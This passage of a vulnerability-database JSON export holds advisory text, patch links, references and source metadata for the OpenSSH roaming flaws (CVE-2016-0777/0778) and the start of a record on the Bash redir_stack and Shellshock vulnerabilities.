7):\n\nppc64:\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.ppc64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc64.rpm\n\nppc64le:\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.ppc64le.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc64le.rpm\n\ns390x:\nopenssh-debuginfo-6.6.1p1-23.el7_2.s390.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.s390x.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.s390.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.s390x.rpm\n\nx86_64:\nopenssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssh-6.6.1p1-23.el7_2.src.rpm\n\nx86_64:\nopenssh-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-6.6.1p1-23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-0777\nhttps://access.redhat.com/security/cve/CVE-2016-0778\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/articles/2123781\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFWmAWQXlSAg2UNWIIRAh17AJ9SiT1MA1YtOA6ctMp9jIo4e9XrFwCgkbmo\nnXgYWs8cZcyoTRVoriTGHQo=\n=1sk9\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n", "sources": [ { "db": "NVD", "id": "CVE-2016-0778" }, { "db": "CERT/CC", "id": "VU#456088" }, { "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "db": "BID", "id": "80698" }, { "db": "VULHUB", "id": "VHN-88288" }, { "db": "VULMON", "id": "CVE-2016-0778" }, { "db": "PACKETSTORM", "id": "135250" }, { "db": "PACKETSTORM", "id": "135273" }, { "db": "PACKETSTORM", "id": "135259" }, { "db": "PACKETSTORM", "id": "136346" }, { "db": "PACKETSTORM", "id": "135283" }, { "db": "PACKETSTORM", "id": "135263" } ], "trust": 3.33 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-0778", "trust": 4.3 }, { "db": "BID", "id": "80698", "trust": 2.1 }, { "db": "JUNIPER", "id": "JSA10734", "trust": 2.1 }, { "db": "CERT/CC", "id": "VU#456088", "trust": 2.0 }, { "db": "PACKETSTORM", "id": "135273", "trust": 1.9 }, { "db": "SECTRACK", "id": "1034671", "trust": 1.8 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2016/01/14/7", "trust": 1.8 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.8 }, { "db": "JVN", "id": "JVNVU95595627", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU97668313", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-001117", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201601-250", "trust": 0.7 }, { "db": "JUNIPER", "id": "JSA10774", "trust": 0.3 }, { "db": "SEEBUG", "id": "SSVID-90447", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-88288", "trust": 0.1 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2016-0778", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135250", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135259", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136346", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135283", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135263", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#456088" }, { "db": "VULHUB", "id": "VHN-88288" }, { "db": "VULMON", "id": "CVE-2016-0778" }, { "db": "BID", "id": "80698" }, { "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "db": "PACKETSTORM", "id": "135250" }, { "db": "PACKETSTORM", "id": "135273" }, { "db": "PACKETSTORM", "id": "135259" }, { "db": "PACKETSTORM", "id": "136346" }, { "db": "PACKETSTORM", "id": "135283" }, { "db": "PACKETSTORM", "id": "135263" }, { "db": "CNNVD", "id": "CNNVD-201601-250" }, { "db": "NVD", "id": "CVE-2016-0778" } ] }, "id": "VAR-201601-0030", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-88288" } ], "trust": 0.01 }, "last_update_date": "2024-07-23T20:39:22.908000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "APPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update 2016-002", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00004.html" }, { "title": "HT206167", "trust": 0.8, "url": "https://support.apple.com/en-us/ht206167" }, { "title": "HT206167", "trust": 0.8, "url": "https://support.apple.com/ja-jp/ht206167" }, { "title": "HPSBGN03638", "trust": 0.8, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05247375" }, { "title": "AXSA:2016-037:01", "trust": 0.8, "url": "https://tsn.miraclelinux.com/ja/node/6397" }, { "title": "release-7.1p2", "trust": 0.8, "url": "http://www.openssh.com/txt/release-7.1p2" }, { "title": "Oracle Solaris Third Party Bulletin - October 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html" }, { "title": "Oracle Linux Bulletin - January 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html" }, { "title": "UTM Up2Date 9.354 released", "trust": 0.8, "url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/" }, { "title": "UTM Up2Date 9.319 released", "trust": 0.8, "url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/" }, { "title": "OpenSSH Remediation measures for denial of service vulnerabilities", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=59597" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2016/05/05/juniper_patches_opensshs_roaming_bug_in_junos_os/" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2016/01/14/openssh_is_wide_open_to_key_theft_thanks_to_roaming_flaw/" }, { "title": "Ubuntu Security Notice: openssh vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2869-1" }, { "title": "Debian Security Advisories: DSA-3446-1 openssh -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=ae57bf01ef5062fb12be694f4a95eb69" }, { "title": "Debian CVElist Bug Report Logs: openssh-client: CVE-2016-0777", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=5382b188b84b87a2670c7f1e661e15b8" }, { "title": "Amazon Linux AMI: ALAS-2016-638", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-638" }, { "title": "Red Hat: CVE-2016-0778", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-0778" }, { "title": "Symantec Security Advisories: SA109 : Multiple OpenSSH Vulnerabilities (January 2016)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=ef164fe57ef1d1217ba2dc664dcecce2" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - January 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=8ad80411af3e936eb2998df70506cc71" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=92308e3c4d305e91c2eba8c9c6835e83" }, { "title": "puppet-module-ssh", "trust": 0.1, "url": "https://github.com/ghoneycutt/puppet-module-ssh " }, { "title": "fabric2", "trust": 0.1, "url": "https://github.com/winstonn/fabric2 " }, { "title": "", "trust": 0.1, "url": "https://github.com/cpcloudnl/ssh-config " }, { "title": "Linux_command_crash_course", "trust": 0.1, "url": "https://github.com/akshayprasad/linux_command_crash_course " }, { "title": "nmap", "trust": 0.1, "url": "https://github.com/project7io/nmap " }, { "title": "DC-2-Vulnhub-Walkthrough", "trust": 0.1, "url": "https://github.com/vshaliii/dc-2-vulnhub-walkthrough " }, { "title": "DC-1-Vulnhub-Walkthrough", "trust": 0.1, "url": "https://github.com/vshaliii/dc-1-vulnhub-walkthrough " }, { "title": "satellite-host-cve", "trust": 0.1, "url": "https://github.com/redhatsatellite/satellite-host-cve " } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-0778" }, { "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "db": "CNNVD", "id": "CNNVD-201601-250" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-88288" }, { "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "db": "NVD", "id": "CVE-2016-0778" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.9, "url": "http://www.openssh.com/txt/release-7.1p2" }, { "trust": 2.4, "url": "http://www.securityfocus.com/bid/80698" }, { "trust": 2.4, "url": "http://www.debian.org/security/2016/dsa-3446" }, { "trust": 2.4, "url": "http://packetstormsecurity.com/files/135273/qualys-security-advisory-openssh-overflow-leak.html" }, { "trust": 2.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html" }, { "trust": 2.1, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html" }, { "trust": 1.9, "url": "https://www.qualys.com/2016/01/14/cve-2016-0777-cve-2016-0778/openssh-cve-2016-0777-cve-2016-0778.txt" }, { "trust": 1.9, "url": "https://security.gentoo.org/glsa/201601-01" }, { "trust": 1.9, "url": "http://www.ubuntu.com/usn/usn-2869-1" }, { "trust": 1.8, "url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00004.html" }, { "trust": 1.8, "url": "http://www.securityfocus.com/archive/1/537295/100/0/threaded" }, { "trust": 1.8, "url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/" }, { "trust": 1.8, "url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/" }, { "trust": 1.8, "url": "https://bto.bluecoat.com/security-advisory/sa109" }, { "trust": 1.8, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05247375" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05356388" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05385680" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05390722" }, { "trust": 1.8, "url": "https://support.apple.com/ht206167" }, { "trust": 1.8, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-february/176516.html" }, { "trust": 1.8, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-january/176349.html" }, { "trust": 1.8, "url": "http://seclists.org/fulldisclosure/2016/jan/44" }, { "trust": 1.8, "url": "http://www.openwall.com/lists/oss-security/2016/01/14/7" }, { "trust": 1.8, "url": "http://www.securitytracker.com/id/1034671" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00006.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00007.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00008.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00009.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00013.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00014.html" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10734" }, { "trust": 1.6, "url": "http://undeadly.org/cgi?action=article\u0026sid=20160114142733" }, { "trust": 1.2, "url": "https://www.kb.cert.org/vuls/id/456088" }, { "trust": 1.1, "url": "http://ftp.openbsd.org/pub/openbsd/patches/5.7/common/022_ssh.patch.sig" }, { "trust": 1.1, "url": "http://www.ubuntu.com/usn/usn-2869-1/" }, { "trust": 0.9, "url": "https://access.redhat.com/articles/2123781" }, { "trust": 0.8, "url": "https://github.com/openssh/openssh-portable/blob/8408218c1ca88cb17d15278174a24a94a6f65fe1/roaming_client.c#l70" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-0777" }, { "trust": 0.8, "url": "https://isc.sans.edu/forums/diary/openssh+71p2+released+with+security+fix+for+cve20160777/20613/" }, { "trust": 0.8, "url": "https://security-tracker.debian.org/tracker/cve-2016-0778" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-0778" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu95595627/index.html" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu97668313" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-0778" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0778" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0777" }, { "trust": 0.4, "url": "https://rhn.redhat.com/errata/rhsa-2016-0043.html" }, { "trust": 0.3, "url": "http://www.openssh.com" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10734\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10774\u0026actp=rss" }, { "trust": 0.3, "url": "http://ftp.openbsd.org/pub/openbsd/patches/5.8/common/010_ssh.patch.sig" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05247375" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023271" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023319" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099309" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021138" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssh_advisory7.asc" }, { "trust": 0.3, "url": "https://securityadvisories.paloaltonetworks.com/home/detail/44" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978487" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000044" }, { "trust": 0.3, "url": "https://gtacknowledge.extremenetworks.com/articles/vulnerability_notice/vn-2016-001-openssh" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021109" }, { "trust": 0.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10734" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "https://github.com/ghoneycutt/puppet-module-ssh" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssh/1:6.7p1-5ubuntu1.4" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssh/1:6.6p1-2ubuntu2.4" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssh/1:6.9p1-2ubuntu0.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssh/1:5.9p1-5ubuntu1.8" }, { "trust": 0.1, "url": "https://sourceware.org/ml/libc-alpha/2014-12/threads.html#00506" }, { "trust": 0.1, "url": "https://www.securecoding.cert.org/confluence/display/c/msc06-c.+beware+of+compiler+optimizations" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/14.html" }, { "trust": 0.1, "url": "https://www.securecoding.cert.org/confluence/display/c/mem06-c.+ensure+that+sensitive+data+is+not+written+out+to+disk" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/244.html" }, { "trust": 0.1, "url": "https://www.securecoding.cert.org/confluence/display/c/mem03-c.+clear+sensitive+information+stored+in+reusable+resources" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7551" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht201222" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8659" }, { "trust": 0.1, "url": "https://gpgtools.org" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8035" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8472" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1819" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3195" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7499" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0801" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8242" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8126" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht206171" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1732" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5312" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7942" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7500" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9495" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1734" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1740" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5334" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1733" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1736" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1735" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5333" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0802" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1738" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1737" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0973" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-0777" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-0778" }, { "trust": 0.1, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.1, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0777" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0778" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/contact/" } ], "sources": [ { "db": "CERT/CC", "id": "VU#456088" }, { "db": "VULHUB", "id": "VHN-88288" }, { "db": "VULMON", "id": "CVE-2016-0778" }, { "db": "BID", "id": "80698" }, { "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "db": "PACKETSTORM", "id": "135250" }, { "db": "PACKETSTORM", "id": "135273" }, { "db": "PACKETSTORM", "id": "135259" }, { "db": "PACKETSTORM", "id": "136346" }, { "db": "PACKETSTORM", "id": "135283" }, { "db": "PACKETSTORM", "id": "135263" }, { "db": "CNNVD", "id": "CNNVD-201601-250" }, { "db": "NVD", "id": "CVE-2016-0778" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#456088" }, { "db": "VULHUB", "id": "VHN-88288" }, { "db": "VULMON", "id": "CVE-2016-0778" }, { "db": "BID", "id": "80698" }, { "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "db": "PACKETSTORM", "id": "135250" }, { "db": "PACKETSTORM", "id": "135273" }, { "db": "PACKETSTORM", "id": "135259" }, { "db": "PACKETSTORM", "id": "136346" }, { "db": "PACKETSTORM", "id": "135283" }, { "db": "PACKETSTORM", "id": "135263" }, { "db": "CNNVD", "id": "CNNVD-201601-250" }, { "db": "NVD", "id": "CVE-2016-0778" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-14T00:00:00", "db": "CERT/CC", "id": "VU#456088" }, { "date": "2016-01-14T00:00:00", "db": "VULHUB", "id": "VHN-88288" }, { "date": "2016-01-14T00:00:00", "db": "VULMON", "id": "CVE-2016-0778" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80698" }, { "date": "2016-01-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "date": "2016-01-14T17:27:54", "db": "PACKETSTORM", "id": "135250" }, { "date": "2016-01-15T02:09:54", "db": "PACKETSTORM", "id": "135273" }, { "date": "2016-01-15T00:03:14", "db": "PACKETSTORM", "id": "135259" }, { "date": "2016-03-22T15:18:02", "db": "PACKETSTORM", "id": "136346" }, { "date": "2016-01-18T04:26:08", "db": "PACKETSTORM", "id": "135283" }, { "date": "2016-01-15T00:04:21", "db": "PACKETSTORM", "id": "135263" }, { "date": "2016-01-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-250" }, { "date": "2016-01-14T22:59:02.280000", "db": "NVD", "id": "CVE-2016-0778" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-20T00:00:00", "db": "CERT/CC", "id": "VU#456088" }, { "date": "2022-12-13T00:00:00", "db": "VULHUB", "id": "VHN-88288" }, { "date": "2022-12-13T00:00:00", "db": "VULMON", "id": "CVE-2016-0778" }, { "date": "2017-01-23T03:06:00", "db": "BID", "id": "80698" }, { "date": "2016-10-27T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "date": "2022-12-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-250" }, { "date": "2022-12-13T12:15:19.253000", "db": "NVD", "id": "CVE-2016-0778" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-250" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSH Client contains a client information leak vulnerability and buffer overflow", "sources": [ { "db": "CERT/CC", "id": "VU#456088" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-250" } ], "trust": 0.6 } }
var-201409-1147
Vulnerability from variot
The redirection implementation in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted use of here documents, aka the "redir_stack" issue. GNU Bash 4.3 and earlier contains a command injection vulnerability that may allow remote code execution. GNU Bash is prone to a local memory-corruption vulnerability. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. GNU Bash 3.2 and later are vulnerable; prior versions may also be affected.
NOTE: This vulnerability can only be exploited if the attacker already has valid administrative login credentials. ============================================================================ Ubuntu Security Notice USN-2364-1 September 27, 2014
bash vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in Bash. (CVE-2014-7186, CVE-2014-7187)
In addition, this update introduces a hardening measure which adds prefixes and suffixes around environment variable names which contain shell functions.
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 LTS: bash 4.3-7ubuntu1.4
Ubuntu 12.04 LTS: bash 4.2-2ubuntu2.5
Ubuntu 10.04 LTS: bash 4.1-2ubuntu3.4
In general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----
CA20141001-01: Security Notice for Bash Shellshock Vulnerability
Issued: October 01, 2014 Updated: October 03, 2014
CA Technologies is investigating multiple GNU Bash vulnerabilities, referred to as the "Shellshock" vulnerabilities, which were publicly disclosed on September 24-27, 2014. CVE identifiers CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and CVE-2014-6278 have been assigned to these vulnerabilities.
The CA Technologies Enterprise Information Security team has led a global effort to identify and remediate systems and products discovered with these vulnerabilities. We continue to patch our systems as fixes become available, and we are providing fixes for affected CA Technologies products.
CA Technologies continues to aggressively scan our environments (including servers, networks, external facing applications, and SaaS environments) to proactively monitor, identify, and remediate any vulnerability when necessary.
Risk Rating
High
Platform
